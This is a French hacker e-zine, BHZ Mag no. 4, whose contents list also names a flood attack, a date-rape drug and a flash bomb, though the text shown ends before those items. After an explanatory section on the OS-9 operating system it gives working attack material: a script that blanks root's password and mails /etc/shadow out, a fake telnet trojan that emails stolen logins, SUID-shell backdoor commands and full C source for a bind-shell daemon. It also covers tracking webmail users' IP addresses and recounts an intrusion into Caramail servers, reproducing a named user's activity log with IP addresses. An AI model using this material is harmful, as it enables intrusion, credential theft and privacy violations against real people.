œœœœœœ õõõõõõ**** 44 44 ** ************** 44 44 **|********* ** ** ************* 44 44 ** œœœœœ *** *** ** 666 * ___ 44 44 *|* ** *** ** 666 * / ) 44 44 *| * ** ** ** ** ! ) 444444444444444 *|* * ** ** *** \ | 444444444444444 *|* * ** ** ££££££** ÝÝ 999999 (___) 44 *|12345678910 ù%%%%õõœœœ *** ÝÝÝ ** 44 **|* ******* ******** *** ÝÝÝ ** 44 **|*********** ** 666 * ** ÝÝ ** 44 $$|* ** ** ** ** ÝÝ ** 44 *|* * ** ** ** ÝÝ ** 44 *|** ** ** ** ** ÝÝ ** */* ******** *** ** ** $$$$$$$ BHZ *** !!!!!!!!!!!!! * ----- **** The Belgian Hackers Zone !!! Si vous etes sous Win lisez ce zine avec ce que vous voulez parce que de toute facon je crois qu'il y a des articles que j'ai ecrit avec edit,d'autres avec le bloc-notes ou avec Kedit sous KDE.Alors pour les accents ben je suppose que vous comprendrez... Si vous lisez ceci c'est que vous avez telecharge BHZ Mag n°4 à partir du site de madchat. cette version est une version censuree du zine, afin de lire la version originale, rendez vous sur le site du BHZ : http://www.thebhz.org - http://www.bhz.be.tf ou sur un des autres sites qui distribuent BHZ mag : SpyderMag (http://www.spydermag.net), le site de Neuro (http://www.neuro.fr.st), etc... <<>> -Attention- <<>>------<<>>------<<>>------<<>>------<<>> <<>> Je ne suis en aucun cas responsable de vos actes suite à la lecture de ces aricle. <<>>-------<<>>--------<<>>--------<<>>--------<<>>--------<<>> Tous les articles presents dans ce zine ont ete ecrits par ASMODEUS. email : asmodeus@mail.be The Belgian Hackers Zone : www.bhz.be.tf ou www.altern.org/bhz Si vous voulez ecrire un article ou si vous avez une proposition d'article, si y'a un truc que vous pigez pas, si vous voulez m'insulter, ou encore si vous êtes une fille au physique genereux, envoyez-moi un email : asmodeus@mail.be 1.Le systeme d'exploitation OS-9 ********************************* 2.Script de shell pour piratage de compte root *********************************************** 3.Creation d'un cheval de Troie ******************************* 4.Creation d'une backdoor ************************* 5.virus HTML ************ 6.Obtenir une IP à partir d'une email de type webmail **************************************** 7.Hack de Caramail version 3 ! ****************************** 8.Faire planter un serveur avec un flood icmp ********************************************* 9. Le GHB : la drogue des violeurs... ************************************* 10.Fabrication d'une bombe aveuglante ************************************* 11.Les differentes facons de se faire de l'argent legalement sur le net *********************************************************************** 12.Scan de numeros verts ************************ 13.Clipart Gallery overflow *************************** 1. Le systeme d'exploitation OS-9 ********************************* OS-9 est un systeme d'exploitation multitƒches, multi-utilisateurs similaire … Unix (Unix like). Pourtant a la difference de ce dernier, OS-9 est un systŠme temps reel, compact et modulaire. OS-9 est de part sa modularite et sa compacite un systeme d'exploitation embarque. C'est … dire qu'il est possible d'integrer ce systeme d'exploitation dans un ensemble autonome sans memoire de masse. Par exemple, OS-9 est le systeme qui a ete retenu par Sony et Philips pour gerer leur lecteur CD-I.(OK les CD-I ca n'a jamais eu de succes mais bon ca aurait pu en avoir...) Il est ne en 1980 et a ete concu … l'origine pour le processeur Motorola 6809 par la société Microware Systems Corp.. OS-9 s'execute maintenant sur une multitude de plates-formes allant du processeur Motorola 68k au processeur PowerPC en passant par la gamme des processeurs Intel.(Bouh les mechants processeurs de chez Intel) Les bases d'OS-9 *************** Sommaire ******** 1.Le multitache 2.La preemption et le temps reel 3.Communication entre taches 4.Caracteristiques principales d'OS-9 5.Architecture logicielle d'OS-9 6.Glossaire Le multitache ------------- Le multitache permet à plusieurs programmes indépendants, appelés processus ou taches de s'exécuter " simultanément ". (Ex:Dos n'est pas un OS multitache mais Linux et Windaube le sont) C'est rendu possible par le partage de la ressource processeur dans le temps. OS-9 organise cette repartition en utilisant une file d'attente des taches actives, organisée suivant un niveau de priorite. La priorite d'un processus a un instant donne repond a l'equation suivante : Priorite = Priorite Initiale + Age (C'est la que ca se differencie des autres OS:ils sont pas cons chez Microware) Le processeur est interrompu régulierement par une horloge temps reel et determine s'il faut commuter de tache. Si le processus en cours a une priorité inferieure au processus qui arrive en début de file d'attente, il y a commutation de tache. Le processus interrompu est reintégrer dans la file d'attente avec sa priorite initiale. Si le processus en cours a une priorité supérieure ou égale au processus qui arrive en debut de file d'attente, la priorité des taches de la file est incrementée. Pour fixer les idées, le temps de commutation est de 55 µs(nanosecondes) auquelles on ajoute 1,5 µs par processus present dans la file d'attente pour un système à base de processeur 68020 cadencé à 20MHz. Ce principe de file de tâche pose pourtant quelques problèmes. Tout d'abord, ce mécanisme est antagoniste au temps réel, en effet, le temps de reponse à un evenement depend de la place qu'occupe dans la file d'attente le processus qui l'a declenche. Ce qui amene a se poser la question suivante : Comment gerer les evenements asynchrones, tel que les interruptions ? La préemption et le temps réel ------------------------------ Pour gerer les événements asynchrones prioritaires, les exceptions, OS-9 utilise le mecanisme de preemption. C'est à dire que le système définit un seuil de priorité au-dessus duquel la tache devient preemptive. En designant Pe, comme la priorite de l'evenement, S le seuil de préemption et Pt la priorité du processus en cours, on a un algorithme:le principe de preemption L'ordonnancement Round Robin permet de répartir le temps processeur entre les processus preemptifs. Chacun de ces processus se voit allouer le meme temps à tour de role.(et non en meme temps comme dans WinDaube,ce qui ralentirait l'ordi) Pour fixer les idees, le temps de préemption est de 11 µs pour un système à base de processeur 68020 cadencé à 20 MHz. Communication entre tâches -------------------------- Le multitâche permet donc de repartir le temps processeur entre plusieurs processus. Mais ce multitache ne sert à rien si il n'est pas possible de faire communiquer ces différents processus entre eux. Pour ce faire OS-9 utilise suivant les besoins du programmeur : Les modules de données. Les signaux. Les pipes.(non pas ces pipes la...) Les disques magnetiques ou virtuels. Les modules de donnees sont des blocs de memoire partageables entre plusieurs processus. Ils permettent un accès très rapide aux données qui doit être géré par le programmeur a l'aide de variables evenements. Les modules de donnees permettent le travail en temps reel. Les signaux permettent une transmission rapide d'une faible quantite d'information (un mot maximum). Leur gestion est assurée par OS-9. Les pipes sont des zones de memoires gerees par OS-9 sous formes de structures FIFO (First In First Out) ou l'on stocke les informations a transmettre. Les disques, quant a eux permettent de transmettre une grande quantite d'information. Les disques virtuels sont des zones de memoire vive gerees de la même façon qu'un disque magnétique. Ce qui permet de transmettre une grande quantité d'information en améliorant la vitesse.(Comme le cache)Les disques magnetiques permettent en plus de perenniser les informations. Caractéristiques principales d'OS-9 ----------------------------------- Le système OS-9 présente une caracteristique fondamentale, il est modulaire. C'est à dire qu'il est architecture en modules mémoire. Le noyau du système ainsi que tous les modules d'entrée-sortie sont écrits en langage assembleur, gage de rapidité. (Et pas en C comme pour LinuX) Les modules sont reentrants. Il faut comprendre par la, que les modules peuvent être partages par plusieurs processus. Ce qui permet une grande compacite car le code executable du module n'est present qu'une seule fois en memoire. De plus l'integrite des modules est verifiee, à l'aide de CRC conferant à OS-9 une grande securite. OS-9 est un systeme compatible avec Unix, au niveau du code. C'est à dire qu'un programme écrit en langage C, pourra être compile sur l'un ou l'autre de ces systemes. Il est par contre indispensable dans ce cas, d'accéder aux ressources par l'intermédiaire du systeme d'exploitation et de se limiter à l'emploi des bibliotheques de fonctions standardisées. Enfin, du fait de sa modularite, OS-9 est un système evolutif, pouvant s'adapter à une multitude de processeur et d'architecture, allant du système de développement, lourd et puissant au petit système embarqué implante dans un tableau de bord d'automobile ou dans une télévision (système de télévision interactive DAVID). Tout ceci fait d'OS-9 un systeme performant, souple et compact. Pour illustrer cette compacité, ce tableau donne la taille memoire occupee par les modules d'OS-9. Dans la pratique, on peut arriver a embarquer OS-9 dans 32 Ko de mémoire Tableau - Tailles des modules d'OS-9 Types de modules Taille Noyau 13,0 Ko Gestionnaire de fichiers caractères 1,5 Ko Gestionnaire de circuits Acia 1,3 Ko Descripteur de périph. 0,1 Ko Taille minimale du système. 15,9 Ko Gestionnaire de fichiers disques 5,4 Ko Gestionnaire de circuits disquettes 1,1 Ko Gestionnaire de circuits disques durs 1,2 Ko Gestionnaire de circuits pipes 1,8 Ko Shell interpréteur 15,0 Ko Architecture logicielle d'OS-9 ------------------------------ L'architecture d'OS-9 est organisee en plusieurs niveaux.Elle peut se décomposer en 4 niveaux,constitues chacun d'un ou plusieurs modules mémoire. Au niveau 1, on trouve le noyau executif, ou kernel, chargé d'executer les fonctions propres au systeme, comme la commutation de taches ou l'allocation memoire. On trouve aussi, le module clock specifique au circuit horloge temps reel utilise, charge de découper le temps en tranches (ticks) afin de cadencer la commutation de taches. Enfin, on trouve le module de donnée Init qui est une table de parametres sollicitee par le noyau durant le demarrage. A ces trois modules indispensables, peuvent s'ajouter des modules de fonctions necessaires à une application specifique. Ces modules de fonctions, ou librairies, sont tres optimises puisqu'ils font partie du systeme, et permettent de répondre à une multitudes de besoins. Par exemple, on pourra integrer a ce niveau une librairie chargee de piloter un coprocesseur mathematique effectuant les calculs sur les nombres en virgule flottante. Au niveau 2, on trouve les gestionnaires de fichiers (files manager), charges de traiter un type particulier de transfert. On trouve par exemple un gestionnaire de fichier oriente vers le transfert de caracteres (Sequential Character File manager) et un autre oriente vers le transfert de bloc de caracteres (Random Block File manager). Au niveau 3,on trouve les gestionnaires de circuits (device manager),specifiques a un type de circuit integre donne (Acia 6850). Comme tout les autres modules executables, ces gestionnaires sont reentrants, ainsi, pour un type de circuit donne, un seul de ces gestionnaires est present en memoire, quelque soit le nombre de circuits physiquement presents. Niveau 4, Les descripteurs de péripheriques, petites tables de parametres associeer à chaque port du systeme. Il y a autant de descripteurs qu'il y a d e circuit présents physiquement. Cette architecture peut paraître lourde et complexe, mais elle permet au programmeur et plus generalement à l'utilisateur de s'affranchir de la configuration materielle du système. En conclusion, on peut dire qu'OS-9 est un systeme d'exploitation : Multitache. Temps reel. Compact et modulaire, embarque. Sur et evolutif. Son avenir le destine a etre integre au coeur des processeurs Motorola grace à une coopération technique et financiere entre cette société et Microware. Mais ce n'est pas le seul domaine d'expansion, Microware est partenaire de General Instruments pour le developpement de la television interactive aux Etats Unis, dans les domaines de la decompression vidéo MPEG-2 et les interfaces graphiques. Pour plus d'infos: http://os9archive.rtsi.com/os9faq.html (en anglais) http://www.microware.com (en anglais) 2.Script de shell pour piratage de compte root *********************************************** Si vous etes sous un systeme Linux (j'ai essaye ca avec la Suse 6.3),vous avez certainement remarque qu'en tant que root,le repertoire courant n'est pas dans le chemin d'acces.C'est la raison pour laquelle il faut toujours faire preceder le nom du programme a executer de ./ L'exemple suivant montre pourquoi Suse est configure comme ca: -Il suffit de creer le script shell suivant: #!/bin/sh cat /etc/shadow | \ sed 's;\(^root:\)[^:]*\(:.*\);\1\2;' > /etc/shadow mailx asmodeus@mail.be -s "Account root hacke" < /etc/shadow /bin/ls $* -puis de le deplacer vers /tmp/ls -si le root change maintenant de repertoire (commande cd) et s'il a insere le repertoire courant (dans ce cas tmp) devant /bin dans la variable $PATH,le script sera execute a la place de /bin/ls.Ce qui entraine la suppression du mot de passe du root ;-) et l'utilisateur (Asmodeus dans le script exemple) recevra un msg lui faisant savoir qu'il a maintenant un compte root sans mot de passe sur ce serveur ! 3.Creation d'un cheval de Troie ******************************* (Attention ici quand je dis cheval de Troie,je veux dire pour un serveur(ou un systeme Unix/Linux) et pas un prog con qui sert a formater le HD de quelqu'un dont vous avez l'IP... Comme vous devez vous en douter,les programmes cheval de Troie sont des progs cahes qui obtiennent l'acces root a l'insu de la victime.Par exemple un etudiant ouvre une session sur son compte puis apres avoir mate quelques sites pornos il va se masturber aux toilettes...(ah le con).C la que le hackeur arrive: il a acces au compte du branleur.Sans connaitre le mot de passe mais sachant que la victime est un etudiant.Le hackeur peut modifier le PATH dans le login ou dans le fichier .profile du branleur: PATH=/usr/bin:/bin:/usr/local/bin:/sbin:/usr/bin:/usr/local/bin:/usr/X11R6/bin Apres ce changement la commande PATH est executee dans le premier repertoire. Si la commande est introuvable,le processus mis en place cherche dans le repertoire suivant...Maintenant reflechissons un peu : il suffit de creer un script,l'appeler telnet et l'inserer dans le reprtoire home de la victime. Script qui permettrait d'avoir le mot de passe de la victime/branleur.Apres avoir cree ce fichier,il faut fermer la session sans que personne ne s'en rende compte (evitez de faire ca sur le poste a cote de l'admin...) Voici donc un exemple de script cheval de Troie: #! /bin/sh #Trojan Telnet by Asmodeus session echo "Trying $1...."echo "Connected to $1."echo "Escape character is /'^]\'," echo " " echo "Linux 2.0.34." echo " " echo $1login: " read ID echo "password: " read PW echo "Login incorrect." echo "User $ID ands password $PW" | mail asmodeus@mail.be rm $0 kill -9 $PPID Ce script ressemble au programme reel (sauf qu'il ne boucle pas trois fois parce que j'ai pas envie de me faire chier..);le bete utilisateur croit que c'est le vrai programme,le programme(le faux) m'envoie le nom et le mot de passe par e=mail puis le programme se suicide...(rm $0) et tue aussi son processus (suicide collectif ;=) ) (kill -9 $PPID). Cet programme permet de chope un nom d'utilisateur et un mot de passe facilement mais il comporte quend meme quelques petites anomalies (facilement reparables):il ne boucle pas trois fois comme dans une session normale il ne crypte pas le nom d'utilisateur et le mot de passe (ce qui le rend facile à suivre),l'email du hacker est bien là (c pour ca qu'il faut pas choisir un truc genre jean.dupont@hotmail.com....)et le fichier present dans le compte de l'utilisateur peut etre supprime avant que le nom d'utilisateur et le mot de passe ne soient choppes.Mais si le programme se fait passer pour telnet alors il devrait pas y avoir de problemes a ce niveua la. Cependant ce script est une voie facile pour un hackeur qui veut penetrer dans le systeme sans avoir l'acces initial.Ce script pourrait etre execute par un admint insouciant (y'en a beaucoup) qui a des repertoires en ecriture dans son PATH.Il permet d'etre utilisateur local et d'avoir le compte root. 4.Creation d'une backdoor ************************* Supposons que vous vous etes infiltre dans un systeme par l'intermediaire d'un cheval de Troie ou d'un autre programme,mais la breche dans la securite initiale risque d'etre refermee Comment penetrer à nouveau dans le systeme ? Soit vous re=ouvrez une breche plus tard soit vous laissez une backdoor (porte de derriere pour les anglophobes), programme creant un nouveau point d'acces dans l'hote. Une backdoor peut correspondre à un compte utilisateur,un processus ou un port ouvert sur un programme joint.Par exemple dès que vous avez un acces root sur un hote (en vous servant des techniques citees plus haut par exepmle)vous pouvez creer un script qui execute un shell en tant que root pour vous donner acces de nouveau en tant que root.(vous me suivez toujours?).Il faut d'abord copier son shell prefere vers un repertoire utilisateur (compte hote par exemple) et le renomme en -backdoor.Vous creez ainsi un fichier cache que vous pouvez utiliser a tout instant.Voici un exemple de fichier : # cp -/bin/bash /home/guest # mv /home/guest/bash home/guest/.backdoor Saisissez l'acces SUID au fichier et le controle de root : # chmod 4755 home/guest/.backdoor # chown root home/guest/.backdoor L'execution de la commande .backdoor permettra d'acceder au systeme quand vous le voudrez... Une version plus evoluee de backdoor : vanilla.c <----Coupez ici------> /* Vanilla shell daemon with passwort authentification * verbose explanation / sample of a shell daemon * members.xoom.com/i0wnu (c) 1999 by Mixter */ #include #include #include #include #include #include #include int main (int a, char **b) { int c, d, e = sizeof (struct sockaddr_in), f; // c will be our listening socket, d our new socket char p[20]; struct sockaddr_in l, r; l.sin_family = AF_INET; // we fill this with our local ip/port l.sin_port = htons (5); // listen to port 5 l.sin_addr.s_addr = INADDR_ANY; // our IP (filled in by kernel) bzero (&(l.sin_zero), 8); c = socket (AF_INET, SOCK_STREAM, 0); // listening socket signal (SIGCHLD, SIG_IGN); // ignore signals, optional signal (SIGHUP, SIG_IGN); signal (SIGTERM, SIG_IGN); signal (SIGINT, SIG_IGN); bind (c, (struct sockaddr *) &l, sizeof (struct sockaddr)); // bind to port listen (c, 3); // listen to port, maximum 3 active connections while ((d = accept (c, (struct sockaddr *) &r, &e))) // accept blocks and waits for a connection attempt // then assigns the client connection to socket d { if (!fork ()) // if fork is 0, this is the child process and we // will process the clients input { recv (d, p, 19, 0); // wait for up to 19 chars from the client // assign them to p (password variable) for (f = 0; f < strlen (p); f++) // this replaces trailing garbage { if (p[f] == '\n' || p[f] == '\r') p[f] = '\0'; } if (strcmp (p, "test") != 0) // if password isnt "test" { send (d, "\377\373\001", 4, 0); // send an evil telnet cmd :) close (d); // wrong password - bye exit (1); } close (0); // we close the old stdin/out/err copied close (1); // by the fork() and create new ones close (2); dup2 (d, 0); // these give us the new descriptors dup2 (d, 1); // we need them for user interaction dup2 (d, 2); setenv ("PATH", "/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin/:.", 1); unsetenv ("HISTFILE"); execlp ("w", "w", (char *) 0); // set some environment stuff, display logged in users, optional execlp ("sh", "sh", (char *) 0); // execute the shell close (d); exit (0); } // end of if(!fork()) loop (child process specific code) } // end of while() loop return (0); } <----Coupez ici----> 5.Virus HTML ------------- Premiere chose : quand je parle de virus HTML cette fois-ci c'est pas comme les scripts presents dans BHZ Mag n0 3 qui utilisaient ActiveX pour ecrire dans la base de registre.... nom du virus : Wscript/Zulu taille : +- 8K infection : fichiers HTML (html et htm) methode : VBScript (Visual Basic Script) systeme affecte : ben Windoze avec Inetrnet Exploder.... Bon alors le virus est en VBScript et comme il est crypte, au chargement de la page , sa premiere tache est de se decrypter. C'est … ce moment là qu'il devient detectable (par tres tres peu d'anti-virus..) Petites generalites sur les virus HTML : parmi les virus HTML seuls ceux fonctionnant avec VBScript peuvenet ajouter leur propre code en remplacant l'ancien... Les plus connus sont HTML.Internal , Wscript/Zulu , HellScript et un autre dont je ne connais pas le nom.Peut-etre qu'ils agissent tous comme Wscript/Zulu : il y a une chance sur 6 pour que le virus se lance.Sinon il fait rien … l'ordi... Dans Wscript/Zulu , la routine scanne le repertoire (le cache donc) et recherche les fichiers .html et .htm.Le virus va creer un fichier temporaire,se copier dedans puis finalement ecraser le fichier html original sans supprimer les autres donnees. Utopiste (irc : undernet.org #securiweb) dit que la premiere phase de cryptage cache une deuxieme puis une troisieme.Pour connaitre toute l'etendue des possibilites du virus il faudrait avoir la source non cryptee.A partir de là on peut qu'il est polymorphe (puisque sa valeur de cryptage est basee sur une random generee...) Comment se proteger : Linux : rien … craindre evidemment Win avec netscape : non plus puisque netscape lance pas les VBScript... Win avec Internet Explorer (dej… tous ceux qui ont cette config l… meritent de se prendre le virus ... ;-) dans "affichage" , "options des dossiers" , "types de fichiers" allez sur script VBScript et selectionnez "confirmer avant ouverture".(Offline qu'il faut faire ca) puis avec le navigateur allez dans "affichage" , "options Internet" , "securite" et mettez minimum le niveau "medium". Le script : 6.Obtenir une IP à partir d'une email de type webmail **************************************** petite explication : quand on envoie un email avec un programme specifique il faut utiliser un compte pop et le serveur met l'IP de l'emetteur dans l'entete du message. Mais de plus en plus de gens utilisent des adresses de type webmail (ou il faut aller sur un site pour relever son courrier)(ex : caramail,hotmail,moncourrier,etc...)Alors quand on recoit un email de quelqu'un qui a une adresse webmail on a pas son IP.Il y a plusieurs solutions pour l'obtenir : 1ere solution qui marche avec tous les sites : (1)Il faut creer un compteur chez francite (compteur.francite.com) parce que ce sont des compteurs qui memorisent les adresses IP des visiteurs. (2)Il suffit d'inclure le code HTML dans le message ou dans l'objet comme ca quand le mec lira son message francite chopera son IP ou quand il sera sur sa boite de reception si le compteur est dans l'objet.Ce genre de trucs peut permettre de voir quels sont les differents provideurs utilises par un gars,etc... Il faut dire aussi que les compteurs francite peuvent etre redimensionnes de telle sorte qu'ils soient invisibles. La seconde methode fait partie du hack de caramail version 3. 7.Hack de caramail version 3 !! ************************* La seconde methode est totalement differente et je n'ai reussi qu'une fois... Explication : j'etais sur la page de caramail,je m'etais logge et je regardais toutes les fonctions dans la frame de gauche.Je vois "CarAnnuaire",je ne connaissais pas,je regarde le page et ja vois que c'est un annauire de tous les utilisateurs de caramail.Pour voir si ca marche je fais des betes essais avec des gens que je connais puis j'ouvre le lien "CarAnnuaire" dans une nouvelle fenetre.L'adresse est quelque chose comme cara3.caramail.com/scripts/repondeur.exe puis j'examine la source,la case ou on tape le nom ou le pseudo de lapersonne qu'on cherche n'etait pas limitee en caracteres.Bon,je me dis que je vais voir si le serveur a une quelconque reaction quand on met tout plein de caracteres.Et là : miracle : bug du script repondeur.exe et j'ai acces au repertoire !!! bon c'est le seul fichier du repertoire alors je monte au niveau superieur (c-à-d cara3.caramail.com/)et là au lieu de m'afficher la page d'index j'ai le listing du repertoire ! (par contre si vous essayez juste de faire cara3.caramail.com/scripts/ y'aura un msg "Virtual Directory listing denied) les repertoires etaient /bin /etc /scripts et y'avait qu'un seul fichier : general.asp (la page d'accueil) je vais dans le repertoire et re-miracle : j'ai le listing.De nouveau un seul fichier : logs-spring_alice.doc .Bon comme je savais pas ce que c'etait et que je me disais que j'aurais peu de chance de retourner là je prends le fichier (+- 500 Ko) rien d'interessant dans le repertoire /etc. Apres je scanne cara3.caramail.com et je vois tous les ports ouverts : 23 telnet 80 www 135 inconnu 513 login/who 512 execk 514 shell/syslog 1029 inconnu 1034 inconnu 5800 inconnu 9877 inconnu (j'ai scanne les ports 1 à 17610) L'OS c'est Microsoft Windows NT avec IIS/4.0 comme serveur http.L'adresse IP de cara3.caramail.com c'est 195.68.99.113 pendant que je scannais j'ai fait un netstat et je vois que j'ai une connexion etablie avec 195.68.99.158 sur le port 2049 !!! j'en deduis donc que caramail m'a trace (pourtant je scannais via un DNS) alors j'ai decide de scanner cette adresse là aussi et là surprise : 21 ftp 23 telnet 37 inconnu 79 finger 80 www 110 pop3 111 portmap/sunrpc 113 identd 143 inconnu 513 login/who 514 shell/syslog 515 pkill 681 inconnu 2049 inconnu (c ce port là qu'ils utilisaient puis après le 6666) 6666 inconnu (l'autre port qui avait une connexion etablie) Pour le truc du CarAnnuaire je crois qu'ils ont change la page mais meme quand je refais la manipulation avec tout plein de caracteres dans la case (j'ai sauvegarde la page puis j'ai change la source) je n'ai plus acces au serveur.Comme leur OS c'est NT 4.0 avec IIS 4.0 on peut faire un buffer overflow.... mais comme ils tracent les IP qui scannent,meme si l'adresse cara3.caramail.com plante,c une autre adresse qui loggera l'IP.... Mais j'ai commence cet article pour expliquer comment on peut chopper des IP alors voilà une fois le fichier logs-spring_alice.doc telecharge je me deconnecte et je l'ouvre.Là j'ai le log de toutes les actions faites par l'utilisateur spring.alice@caramail.com avec chaque fois son adresse IP.Y'a aussi d'autres utilisateurs dans ce meme fichier. mais je ne sais pas pourquoi c'etait le seul fichier de logs present sur ce serveur... Extrait du fichier en question : Logs pour le compte : spring.alice@caramail.com ---------- LOKACENG_PUB_991026 26/10/1999 01:20 61 EMP01 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 01:21 61 CLM25 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 01:21 61 LOK25 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 01:21 61 EMP01 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 01:21 61 PMS02 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 01:22 61 CSW16 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 01:22 61 MUS25 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Composition message 26/10/1999 01:23 61 MUS25 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 01:31 60 TPA47 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu des folders 26/10/1999 01:31 61 TPA49 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 01:31 61 TPA45 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 01:40 61 PMS02 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 01:40 61 MUS25 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 01:41 61 MUS25 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 01:41 61 PMS01 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 01:41 61 FRE04 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Composition message 26/10/1999 01:42 61 PMS01 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 03:05 61 LOK26 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 03:06 61 PLZ02 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Composition message 26/10/1999 03:07 61 TPA45 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 03:07 61 TPA47 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 03:07 61 PLZ02 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 03:08 61 LOK25 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 03:08 61 FRE04 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 03:08 61 PMS02 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 03:09 61 MUS25 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Composition message 26/10/1999 03:10 61 MUS25 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 03:14 60 LOK24 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu des folders 26/10/1999 03:15 61 CLM24 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 03:15 61 PLZ02 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 03:47 60 PLZ02 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu des folders 26/10/1999 03:47 61 CLM25 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 03:47 61 TPA47 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 03:48 61 TPA46 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Composition message 26/10/1999 03:49 61 PLZ02 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 03:54 61 JDI01 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 03:55 61 LOK25 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 03:55 61 PLZ02 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Composition message 26/10/1999 03:56 61 EMP01 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 04:02 61 LOK24 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 04:02 61 LOK25 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Composition message 26/10/1999 04:03 61 LOK26 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 04:07 61 TPA48 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 04:07 61 PLZ01 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Composition message 26/10/1999 04:08 61 MUS25 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 04:16 60 AQU02 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu des folders 26/10/1999 04:16 61 LOK25 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 04:16 61 TPA49 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 04:26 61 TPA48 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 04:27 61 TPA46 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Affiche body du mail 26/10/1999 04:27 61 TPA49 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Composition message 26/10/1999 04:28 61 LOK24 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 04:29 61 LOK26 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 26/10/1999 04:30 61 TPA47 195.162.196.11 195.162.196.11 Mozilla/4.6 [fr] (Win98; I) spring.alice Contenu du dossier Boite de reception 